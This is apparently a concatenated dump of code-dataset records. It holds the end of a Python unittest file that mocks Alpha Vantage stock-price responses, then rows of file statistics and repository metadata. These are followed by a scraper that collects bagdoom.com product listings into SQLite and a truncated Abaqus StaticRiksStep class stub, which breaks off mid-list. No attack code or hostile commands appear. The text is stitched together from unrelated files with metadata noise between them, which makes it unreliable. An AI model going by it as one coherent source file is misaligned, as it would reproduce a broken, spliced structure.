"close": 132.41,
"volume": 1485.0,
"timestamp": "2021-06-21T19:30:00.000000000",
},
{
"open": 132.39,
"high": 132.41,
"low": 132.38,
"close": 132.41,
"volume": 1212.0,
"timestamp": "2021-06-21T19:45:00.000000000",
},
{
"open": 132.38,
"high": 132.45,
"low": 132.38,
"close": 132.45,
"volume": 7165.0,
"timestamp": "2021-06-21T20:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_intraday_30min_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "AAPL",
"candlestick": "30min",
"start_date": "2021-06-21 19:00:00",
"end_date": "2021-06-21 20:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=AAPL&interval=30min&outputsize=full&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Intraday (30min) open, high, low, close prices and volume",
"2. Symbol": "AAPL",
"3. Last Refreshed": "2021-06-21 20:00:00",
"4. Interval": "30min",
"5. Output Size": "Full size",
"6. Time Zone": "US/Eastern",
},
"Time Series (30min)": {
"2021-06-21 20:00:00": {
"1. open": "132.3800",
"2. high": "132.4500",
"3. low": "132.3800",
"4. close": "132.4500",
"5. volume": "7165",
},
"2021-06-21 19:30:00": {
"1. open": "132.3900",
"2. high": "132.4100",
"3. low": "132.3800",
"4. close": "132.4100",
"5. volume": "1212",
},
"2021-06-21 19:00:00": {
"1. open": "132.4000",
"2. high": "132.4100",
"3. low": "132.4000",
"4. close": "132.4100",
"5. volume": "1485",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 132.4,
"high": 132.41,
"low": 132.4,
"close": 132.41,
"volume": 1485.0,
"timestamp": "2021-06-21T19:00:00.000000000",
},
{
"open": 132.39,
"high": 132.41,
"low": 132.38,
"close": 132.41,
"volume": 1212.0,
"timestamp": "2021-06-21T19:30:00.000000000",
},
{
"open": 132.38,
"high": 132.45,
"low": 132.38,
"close": 132.45,
"volume": 7165.0,
"timestamp": "2021-06-21T20:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_intraday_60min_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "AAPL",
"candlestick": "60min",
"start_date": "2021-06-21 18:00:00",
"end_date": "2021-06-21 20:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=AAPL&interval=60min&outputsize=full&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Intraday (60min) open, high, low, close prices and volume",
"2. Symbol": "AAPL",
"3. Last Refreshed": "2021-06-21 20:00:00",
"4. Interval": "60min",
"5. Output Size": "Full size",
"6. Time Zone": "US/Eastern",
},
"Time Series (60min)": {
"2021-06-21 20:00:00": {
"1. open": "132.3800",
"2. high": "132.4500",
"3. low": "132.3800",
"4. close": "132.4500",
"5. volume": "7165",
},
"2021-06-21 19:00:00": {
"1. open": "132.3900",
"2. high": "132.4100",
"3. low": "132.3800",
"4. close": "132.4100",
"5. volume": "1212",
},
"2021-06-21 18:00:00": {
"1. open": "132.4000",
"2. high": "132.4100",
"3. low": "132.4000",
"4. close": "132.4100",
"5. volume": "1485",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 132.4,
"high": 132.41,
"low": 132.4,
"close": 132.41,
"volume": 1485.0,
"timestamp": "2021-06-21T18:00:00.000000000",
},
{
"open": 132.39,
"high": 132.41,
"low": 132.38,
"close": 132.41,
"volume": 1212.0,
"timestamp": "2021-06-21T19:00:00.000000000",
},
{
"open": 132.38,
"high": 132.45,
"low": 132.38,
"close": 132.45,
"volume": 7165.0,
"timestamp": "2021-06-21T20:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_intraday_data_error_cannot_find_ticker(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "TICKER_DNE",
"candlestick": "1min",
"start_date": "2021-06-21 19:58:00",
"end_date": "2021-06-21 20:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=TICKER_DNE&interval=1min&outputsize=full&apikey=demo&datatype=json",
json={
"Error Message": "Invalid API call. Please retry or visit the documentation (https://www.alphavantage.co/documentation/) for TIME_SERIES_INTRADAY."
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(response, {"response": []})
@responses.activate
def test_get_daily_adjusted_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "AAPL",
"candlestick": "1day",
"start_date": "2021-06-18 00:00:00",
"end_date": "2021-06-22 00:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=AAPL&outputsize=full&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Daily Prices (open, high, low, close) and Volumes",
"2. Symbol": "AAPL",
"3. Last Refreshed": "2021-06-22",
"4. Output Size": "Full size",
"5. Time Zone": "US/Eastern",
},
"Time Series (Daily)": {
"2021-06-22": {
"1. open": "132.1300",
"2. high": "134.0800",
"3. low": "131.6200",
"4. close": "133.9800",
"5. volume": "74783618",
},
"2021-06-21": {
"1. open": "130.3000",
"2. high": "132.4100",
"3. low": "129.2100",
"4. close": "132.3000",
"5. volume": "79663316",
},
"2021-06-18": {
"1. open": "130.7100",
"2. high": "131.5100",
"3. low": "130.2400",
"4. close": "130.4600",
"5. volume": "108953309",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 130.71,
"high": 131.51,
"low": 130.24,
"close": 130.46,
"volume": 108953309.0,
"timestamp": "2021-06-18T00:00:00.000000000",
},
{
"open": 130.3,
"high": 132.41,
"low": 129.21,
"close": 132.3,
"volume": 79663316.0,
"timestamp": "2021-06-21T00:00:00.000000000",
},
{
"open": 132.13,
"high": 134.08,
"low": 131.62,
"close": 133.98,
"volume": 74783618.0,
"timestamp": "2021-06-22T00:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_weekly_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "IBM",
"candlestick": "1week",
"start_date": "2021-07-16 00:00:00",
"end_date": "2021-07-30 00:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_WEEKLY&symbol=IBM&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Weekly Prices (open, high, low, close) and Volumes",
"2. Symbol": "IBM",
"3. Last Refreshed": "2021-07-30",
"4. Time Zone": "US/Eastern",
},
"Weekly Time Series": {
"2021-07-30": {
"1. open": "141.3900",
"2. high": "143.6400",
"3. low": "140.7900",
"4. close": "140.9600",
"5. volume": "16120616",
},
"2021-07-23": {
"1. open": "136.4500",
"2. high": "144.9200",
"3. low": "136.2089",
"4. close": "141.3400",
"5. volume": "34786264",
},
"2021-07-16": {
"1. open": "141.4300",
"2. high": "141.9599",
"3. low": "138.5900",
"4. close": "138.9000",
"5. volume": "18659679",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 141.43,
"high": 141.9599,
"low": 138.59,
"close": 138.9,
"volume": 18659679.0,
"timestamp": "2021-07-16T00:00:00.000000000",
},
{
"open": 136.45,
"high": 144.92,
"low": 136.2089,
"close": 141.34,
"volume": 34786264.0,
"timestamp": "2021-07-23T00:00:00.000000000",
},
{
"open": 141.39,
"high": 143.64,
"low": 140.79,
"close": 140.96,
"volume": 16120616.0,
"timestamp": "2021-07-30T00:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_monthly_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "IBM",
"candlestick": "1month",
"start_date": "2021-05-28 00:00:00",
"end_date": "2021-07-30 00:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_MONTHLY&symbol=IBM&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Monthly Prices (open, high, low, close) and Volumes",
"2. Symbol": "IBM",
"3. Last Refreshed": "2021-07-30",
"4. Time Zone": "US/Eastern",
},
"Monthly Time Series": {
"2021-07-30": {
"1. open": "146.9600",
"2. high": "147.5000",
"3. low": "136.2089",
"4. close": "140.9600",
"5. volume": "110625907",
},
"2021-06-30": {
"1. open": "145.0000",
"2. high": "152.8400",
"3. low": "143.0400",
"4. close": "146.5900",
"5. volume": "84365220",
},
"2021-05-28": {
"1. open": "143.8100",
"2. high": "148.5150",
"3. low": "140.9200",
"4. close": "143.7400",
"5. volume": "98036425",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 143.81,
"high": 148.515,
"low": 140.92,
"close": 143.74,
"volume": 98036425.0,
"timestamp": "2021-05-28T00:00:00.000000000",
},
{
"open": 145.0,
"high": 152.84,
"low": 143.04,
"close": 146.59,
"volume": 84365220.0,
"timestamp": "2021-06-30T00:00:00.000000000",
},
{
"open": 146.96,
"high": 147.5,
"low": 136.2089,
"close": 140.96,
"volume": 110625907.0,
"timestamp": "2021-07-30T00:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_daily_adjusted_data_error_cannot_find_ticker(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "TICKER_DNE",
"candlestick": "1day",
"start_date": "2021-06-18 00:00:00",
"end_date": "2021-06-22 00:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=TICKER_DNE&outputsize=full&apikey=demo&datatype=json",
json={
"Error Message": "Invalid API call. Please retry or visit the documentation (https://www.alphavantage.co/documentation/) for TIME_SERIES_INTRADAY."
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(response, {"response": []})
def test_failure_missing_candlestick_input(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "IBM",
"start_date": "2021-06-18 00:00:00",
"end_date": "2021-06-22 00:00:00",
},
"outputs": {},
}
with self.assertRaises(DataBlockOneInvalidInputPayloadException):
event_ingestor(payload)
def test_failure_invalid_candlestick_frequency(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "IBM",
"candlestick": "INVALID",
"start_date": "2021-06-18 00:00:00",
"end_date": "2021-06-22 00:00:00",
},
"outputs": {},
}
with self.assertRaises(DataBlockOneInvalidCandlestickException):
event_ingestor(payload)
| 35.6
| 163
| 0.353073
| 2,472
| 30,260
| 4.257686
| 0.112055
| 0.036485
| 0.025083
| 0.028884
| 0.785653
| 0.776912
| 0.748694
| 0.744323
| 0.729311
| 0.718575
| 0
| 0.2036
| 0.511599
| 30,260
| 849
| 164
| 35.641932
| 0.508559
| 0.001355
| 0
| 0.524715
| 0
| 0.017744
| 0.286461
| 0.028461
| 0
| 0
| 0
| 0.001178
| 0.019011
| 1
| 0.021546
| false
| 0.001267
| 0.00507
| 0
| 0.029151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
de504515503229eb2f54aff686fc9f55b107d8bd
| 97
|
py
|
Python
|
scqtlib/plots/__init__.py
|
huangyh09/scQTLib
|
d0d704ab42704d97f780d707626a4f6a6558dd93
|
[
"Apache-2.0"
] | null | null | null |
scqtlib/plots/__init__.py
|
huangyh09/scQTLib
|
d0d704ab42704d97f780d707626a4f6a6558dd93
|
[
"Apache-2.0"
] | null | null | null |
scqtlib/plots/__init__.py
|
huangyh09/scQTLib
|
d0d704ab42704d97f780d707626a4f6a6558dd93
|
[
"Apache-2.0"
] | 1
|
2022-01-07T06:49:45.000Z
|
2022-01-07T06:49:45.000Z
|
from .base_plot import Gboxplot, scatter_adata
from .base_plot import wzhu_colors, vega_20_scanpy
| 48.5
| 50
| 0.865979
| 16
| 97
| 4.875
| 0.75
| 0.205128
| 0.307692
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 0.092784
| 97
| 2
| 50
| 48.5
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
dec483e338d7dcbde0fe0a9f844998abe3498390
| 6,852
|
py
|
Python
|
website/templates/database.py
|
fahad-rewon/SELab
|
431bcf827177d6ba7a5761e58f773b2031bbb79b
|
[
"MIT"
] | null | null | null |
website/templates/database.py
|
fahad-rewon/SELab
|
431bcf827177d6ba7a5761e58f773b2031bbb79b
|
[
"MIT"
] | null | null | null |
website/templates/database.py
|
fahad-rewon/SELab
|
431bcf827177d6ba7a5761e58f773b2031bbb79b
|
[
"MIT"
] | null | null | null |
import sqlite3
from bs4 import BeautifulSoup
import requests
# Create a database in RAM
# db = sqlite3.connect(':memory:')
# Creates or opens a file called mydb with a SQLite3 DB
try:
db = sqlite3.connect('C:\sqlite\mydb.db')
cursor = db.cursor()
# Get a cursor object
cursor.execute('''
CREATE TABLE IF NOT EXISTS product(product_id INTEGER PRIMARY KEY, product_name TEXT,
web_link TEXT, image_link TEXT)
''')
db.commit()
except:
print('table already exists1')
finally:
product_id=0;
##men clothing scrapper bagdoom
page_no = 0
source = requests.get('https://www.bagdoom.com/men/clothing').text
soup = BeautifulSoup(source, 'lxml')
productAmountText = soup.find('p', class_='amount').text
print(productAmountText)
productAmount = productAmountText.split(' ')[33] # 33rd index has amount of products
print(productAmount)
amount = int(productAmount) # string to int
print(amount)
totalPage = int(amount / 60) + 1 # total no of pages that needs to be checked
print(totalPage)
while (page_no < totalPage):
page_no = page_no + 1 #int
pageRef = ('https://www.bagdoom.com/men/clothing.html?p=') + str(page_no) #string
source = requests.get(pageRef).text #string
# print(source)
soup = BeautifulSoup(source, 'lxml') #string
# print(soup.prettify())
allProducts = soup.find('ul', class_='products-grid first') #string
# print(allProducts.prettify())
counter = 0 #int
for singleProduct in allProducts.find_all('a', class_='product-image'):
# singleProductRef=allProducts.find('a', class_='product-image')['href']
# singleProductTitle=allProducts.find('a', class_='product-image')['title']
# singleProductImage=allProducts.find('a', class_='product-image').img['src']
singleProductRef = singleProduct['href'] #string
singleProductTitle = singleProduct['title'] #string
singleProductImage = singleProduct.img['src'] #string
counter = counter + 1 #int
print(singleProductRef)
print(singleProductTitle)
print(singleProductImage)
print()
cursor.execute(''' INSERT INTO product(product_id, product_name, web_link, image_link)
VALUES (?, ?, ?, ?)''', (product_id, singleProductTitle, singleProductRef, singleProductImage))
db.commit()
product_id=product_id+1 #int. also primary key for the database
print(counter)
print(page_no)
##women clothing scrapper bagdoom
page_no = 0
source = requests.get('https://www.bagdoom.com/women/clothing.html?p=1').text
soup = BeautifulSoup(source, 'lxml')
productAmountText = soup.find('p', class_='amount').text
print(productAmountText)
productAmount = productAmountText.split(' ')[33] # 33rd index has amount of products
print(productAmount)
amount = int(productAmount) # string to int
print(amount)
totalPage = int(amount / 60) + 1 # total no of pages that needs to be checked
print(totalPage)
while (page_no < totalPage):
page_no = page_no + 1
pageRef = ('https://www.bagdoom.com/women/clothing.html?p=') + str(page_no)
source = requests.get(pageRef).text
# print(source)
soup = BeautifulSoup(source, 'lxml')
# print(soup.prettify())
allProducts = soup.find('ul', class_='products-grid first')
# print(allProducts.prettify())
counter = 0
for singleProduct in allProducts.find_all('a', class_='product-image'):
# singleProductRef=allProducts.find('a', class_='product-image')['href']
# singleProductTitle=allProducts.find('a', class_='product-image')['title']
# singleProductImage=allProducts.find('a', class_='product-image').img['src']
singleProductRef = singleProduct['href']
singleProductTitle = singleProduct['title']
singleProductImage = singleProduct.img['src']
counter = counter + 1
print(singleProductRef)
print(singleProductTitle)
print(singleProductImage)
print()
cursor.execute(''' INSERT INTO product(product_id, product_name, web_link, image_link)
VALUES (?, ?, ?, ?)''', (product_id, singleProductTitle, singleProductRef, singleProductImage))
db.commit()
product_id=product_id+1
print(counter)
print(page_no)
##mobile scrapper bagdoom
page_no = 0
source = requests.get('https://www.bagdoom.com/electronics/mobiles-tabs/mobiles.html?p=1').text
soup = BeautifulSoup(source, 'lxml')
productAmountText = soup.find('p', class_='amount').text
print(productAmountText)
productAmount = productAmountText.split(' ')[33] # 33rd index has amount of products
print(productAmount)
amount = int(productAmount) # string to int
print(amount)
totalPage = int(amount / 60) + 1 # total no of pages that needs to be checked
print(totalPage)
while (page_no < totalPage):
page_no = page_no + 1
pageRef = ('https://www.bagdoom.com/electronics/mobiles-tabs/mobiles.html?p=') + str(page_no)
source = requests.get(pageRef).text
# print(source)
soup = BeautifulSoup(source, 'lxml')
# print(soup.prettify())
allProducts = soup.find('ul', class_='products-grid first')
# print(allProducts.prettify())
counter = 0
for singleProduct in allProducts.find_all('a', class_='product-image'):
# singleProductRef=allProducts.find('a', class_='product-image')['href']
# singleProductTitle=allProducts.find('a', class_='product-image')['title']
# singleProductImage=allProducts.find('a', class_='product-image').img['src']
singleProductRef = singleProduct['href']
singleProductTitle = singleProduct['title']
singleProductImage = singleProduct.img['src']
counter = counter + 1
print(singleProductRef)
print(singleProductTitle)
print(singleProductImage)
print()
cursor.execute(''' INSERT INTO product(product_id, product_name, web_link, image_link)
VALUES (?, ?, ?, ?)''', (product_id, singleProductTitle, singleProductRef, singleProductImage))
db.commit()
product_id=product_id+1
print(counter)
print(page_no)
db.close()
| 35.6875
| 112
| 0.610479
| 704
| 6,852
| 5.849432
| 0.166193
| 0.026226
| 0.037882
| 0.052453
| 0.865712
| 0.843856
| 0.821515
| 0.821515
| 0.815202
| 0.815202
| 0
| 0.008998
| 0.27014
| 6,852
| 192
| 113
| 35.6875
| 0.814437
| 0.210158
| 0
| 0.817391
| 0
| 0.008696
| 0.193118
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026087
| 0
| 0.026087
| 0.269565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a0f5e95fa3668ab917b7633aac371c6c285a04e7
| 27,058
|
py
|
Python
|
src/abaqus/Step/StaticRiksStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/Step/StaticRiksStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/Step/StaticRiksStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .AnalysisStep import AnalysisStep
from ..Adaptivity.AdaptiveMeshConstraintState import AdaptiveMeshConstraintState
from ..Adaptivity.AdaptiveMeshDomain import AdaptiveMeshDomain
from ..BoundaryCondition.BoundaryConditionState import BoundaryConditionState
from ..Load.LoadCase import LoadCase
from ..Load.LoadState import LoadState
from ..PredefinedField.PredefinedFieldState import PredefinedFieldState
from ..Region.Region import Region
from ..StepMiscellaneous.Control import Control
from ..StepMiscellaneous.SolverControl import SolverControl
from ..StepOutput.DiagnosticPrint import DiagnosticPrint
from ..StepOutput.FieldOutputRequestState import FieldOutputRequestState
from ..StepOutput.HistoryOutputRequestState import HistoryOutputRequestState
from ..StepOutput.Monitor import Monitor
from ..StepOutput.Restart import Restart
class StaticRiksStep(AnalysisStep):
"""The StaticRiksStep object is used to indicate that the step should be analyzed as a
static load step using the modified Riks method for proportional loading cases.
The StaticRiksStep object is derived from the AnalysisStep object.
Attributes
----------
name: str
A String specifying the repository key.
nlgeom: Boolean
A Boolean specifying whether to allow for geometric nonlinearity. The default value is
OFF.
adiabatic: Boolean
A Boolean specifying whether to perform an adiabatic stress analysis. The default value
is OFF.
maxLPF: float
None or a Float specifying the maximum value of the load proportionality factor. The
default value is None.
nodeOn: Boolean
A Boolean specifying whether to monitor the finishing displacement value at a node. The
default value is OFF.
maximumDisplacement: float
A Float specifying the value of the total displacement (or rotation) at the node and
degree of freedom that, if crossed during an increment, ends the step at the current
increment. This argument is required when **nodeOn=ON**. The default value is 0.0.
dof: int
An Int specifying the degree of freedom being monitored. This argument is required when
**nodeOn=ON**. The default value is 0.
timeIncrementationMethod: SymbolicConstant
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc: int
An Int specifying the maximum number of increments in a step. The default value is 100.
totalArcLength: float
A Float specifying the total load proportionality factor associated with the load in
this step. The default value is 1.0.
initialArcInc: float
A Float specifying the initial load proportionality factor. The default value is the
total load proportionality factor for the step.
minArcInc: float
A Float specifying the minimum arc length increment allowed. The default value is the
smaller of the suggested initial load proportionality factor or 10−5 times the total
load proportionality factor for the step.
maxArcInc: float
A Float specifying the maximum arc length increment allowed. The default value is the
total load proportionality factor for the step.
matrixStorage: SymbolicConstant
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
extrapolation: SymbolicConstant
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
noStop: Boolean
A Boolean specifying whether to accept the solution to an increment after the maximum
number of iterations allowed have been completed, even if the equilibrium tolerances are
not satisfied. The default value is OFF.Warning:You should set **noStop=ON** only in
special cases when you have a thorough understanding of how to interpret the results.
useLongTermSolution: Boolean
A Boolean specifying wether to obtain the fully relaxed long-term elastic solution with
time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
viscoplasticity. The default value is OFF.
convertSDI: SymbolicConstant
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
previous: str
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description: str
A String specifying a description of the new step. The default value is an empty string.
fullyPlastic: str
A String specifying the name of the region being monitored for fully Plastic behavior.
The default value is an empty string.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the vertex at which the finishing displacement value is being
monitored. This argument is required when **nodeOn=ON**.
explicit: SymbolicConstant
A SymbolicConstant specifying whether the step has an explicit procedure type
(**procedureType=ANNEAL**, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
perturbation: Boolean
A Boolean specifying whether the step has a perturbation procedure type.
nonmechanical: Boolean
A Boolean specifying whether the step has a mechanical procedure type.
procedureType: SymbolicConstant
A SymbolicConstant specifying the Abaqus procedure. Possible values are:
- ANNEAL
- BUCKLE
- COMPLEX_FREQUENCY
- COUPLED_TEMP_DISPLACEMENT
- COUPLED_THERMAL_ELECTRIC
- DIRECT_CYCLIC
- DYNAMIC_IMPLICIT
- DYNAMIC_EXPLICIT
- DYNAMIC_SUBSPACE
- DYNAMIC_TEMP_DISPLACEMENT
- COUPLED_THERMAL_ELECTRICAL_STRUCTURAL
- FREQUENCY
- GEOSTATIC
- HEAT_TRANSFER
- MASS_DIFFUSION
- MODAL_DYNAMICS
- RANDOM_RESPONSE
- RESPONSE_SPECTRUM
- SOILS
- STATIC_GENERAL
- STATIC_LINEAR_PERTURBATION
- STATIC_RIKS
- STEADY_STATE_DIRECT
- STEADY_STATE_MODAL
- STEADY_STATE_SUBSPACE
- VISCO
suppressed: Boolean
A Boolean specifying whether the step is suppressed or not. The default value is OFF.
fieldOutputRequestState: dict[str, FieldOutputRequestState]
A repository of :py:class:`~abaqus.StepOutput.FieldOutputRequestState.FieldOutputRequestState` objects.
historyOutputRequestState: dict[str, HistoryOutputRequestState]
A repository of :py:class:`~abaqus.StepOutput.HistoryOutputRequestState.HistoryOutputRequestState` objects.
diagnosticPrint: DiagnosticPrint
A :py:class:`~abaqus.StepOutput.DiagnosticPrint.DiagnosticPrint` object.
monitor: Monitor
A :py:class:`~abaqus.StepOutput.Monitor.Monitor` object.
restart: Restart
A :py:class:`~abaqus.StepOutput.Restart.Restart` object.
adaptiveMeshConstraintStates: dict[str, AdaptiveMeshConstraintState]
A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshConstraintState.AdaptiveMeshConstraintState` objects.
adaptiveMeshDomains: dict[str, AdaptiveMeshDomain]
A repository of :py:class:`~abaqus.Adaptivity.AdaptiveMeshDomain.AdaptiveMeshDomain` objects.
control: Control
A :py:class:`~abaqus.StepMiscellaneous.Control.Control` object.
solverControl: SolverControl
A :py:class:`~abaqus.StepMiscellaneous.SolverControl.SolverControl` object.
boundaryConditionStates: dict[str, BoundaryConditionState]
A repository of :py:class:`~abaqus.BoundaryCondition.BoundaryConditionState.BoundaryConditionState` objects.
interactionStates: int
A repository of :py:class:`~abaqus.Interaction.InteractionState.InteractionState` objects.
loadStates: dict[str, LoadState]
A repository of :py:class:`~abaqus.Load.LoadState.LoadState` objects.
loadCases: dict[str, LoadCase]
A repository of :py:class:`~abaqus.Load.LoadCase.LoadCase` objects.
predefinedFieldStates: dict[str, PredefinedFieldState]
A repository of :py:class:`~abaqus.PredefinedField.PredefinedFieldState.PredefinedFieldState` objects.
Notes
-----
This object can be accessed by:
.. code-block:: python
import step
mdb.models[name].steps[name]
The corresponding analysis keywords are:
- STATIC
- STEP
"""
# A String specifying the repository key.
name: str = ''
# A Boolean specifying whether to allow for geometric nonlinearity. The default value is
# OFF.
nlgeom: Boolean = OFF
# A Boolean specifying whether to perform an adiabatic stress analysis. The default value
# is OFF.
adiabatic: Boolean = OFF
# None or a Float specifying the maximum value of the load proportionality factor. The
# default value is None.
maxLPF: float = None
# A Boolean specifying whether to monitor the finishing displacement value at a node. The
# default value is OFF.
nodeOn: Boolean = OFF
# A Float specifying the value of the total displacement (or rotation) at the node and
# degree of freedom that, if crossed during an increment, ends the step at the current
# increment. This argument is required when *nodeOn*=ON. The default value is 0.0.
maximumDisplacement: float = 0
# An Int specifying the degree of freedom being monitored. This argument is required when
# *nodeOn*=ON. The default value is 0.
dof: int = 0
# A SymbolicConstant specifying the time incrementation method to be used. Possible values
# are FIXED and AUTOMATIC. The default value is AUTOMATIC.
timeIncrementationMethod: SymbolicConstant = AUTOMATIC
# An Int specifying the maximum number of increments in a step. The default value is 100.
maxNumInc: int = 100
# A Float specifying the total load proportionality factor associated with the load in
# this step. The default value is 1.0.
totalArcLength: float = 1
# A Float specifying the initial load proportionality factor. The default value is the
# total load proportionality factor for the step.
initialArcInc: float = None
# A Float specifying the minimum arc length increment allowed. The default value is the
# smaller of the suggested initial load proportionality factor or 10−5 times the total
# load proportionality factor for the step.
minArcInc: float = None
# A Float specifying the maximum arc length increment allowed. The default value is the
# total load proportionality factor for the step.
maxArcInc: float = None
# A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
# UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
matrixStorage: SymbolicConstant = SOLVER_DEFAULT
# A SymbolicConstant specifying the type of extrapolation to use in determining the
# incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
# PARABOLIC. The default value is LINEAR.
extrapolation: SymbolicConstant = LINEAR
# A Boolean specifying whether to accept the solution to an increment after the maximum
# number of iterations allowed have been completed, even if the equilibrium tolerances are
# not satisfied. The default value is OFF.Warning:You should set *noStop*=ON only in
# special cases when you have a thorough understanding of how to interpret the results.
noStop: Boolean = OFF
# A Boolean specifying wether to obtain the fully relaxed long-term elastic solution with
# time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
# viscoplasticity. The default value is OFF.
useLongTermSolution: Boolean = OFF
# A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
# occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
# CONVERT_SDI_ON. The default value is PROPAGATED.
convertSDI: SymbolicConstant = PROPAGATED
# A String specifying the name of the previous step. The new step appears after this step
# in the list of analysis steps.
previous: str = ''
# A String specifying a description of the new step. The default value is an empty string.
description: str = ''
# A String specifying the name of the region being monitored for fully Plastic behavior.
# The default value is an empty string.
fullyPlastic: str = ''
# A Region object specifying the vertex at which the finishing displacement value is being
# monitored. This argument is required when *nodeOn*=ON.
region: Region = Region()
# A SymbolicConstant specifying whether the step has an explicit procedure type
# (*procedureType*=ANNEAL, DYNAMIC_EXPLICIT, or DYNAMIC_TEMP_DISPLACEMENT).
explicit: SymbolicConstant = None
# A Boolean specifying whether the step has a perturbation procedure type.
perturbation: Boolean = OFF
# A Boolean specifying whether the step has a mechanical procedure type.
nonmechanical: Boolean = OFF
# A SymbolicConstant specifying the Abaqus procedure. Possible values are:
# - ANNEAL
# - BUCKLE
# - COMPLEX_FREQUENCY
# - COUPLED_TEMP_DISPLACEMENT
# - COUPLED_THERMAL_ELECTRIC
# - DIRECT_CYCLIC
# - DYNAMIC_IMPLICIT
# - DYNAMIC_EXPLICIT
# - DYNAMIC_SUBSPACE
# - DYNAMIC_TEMP_DISPLACEMENT
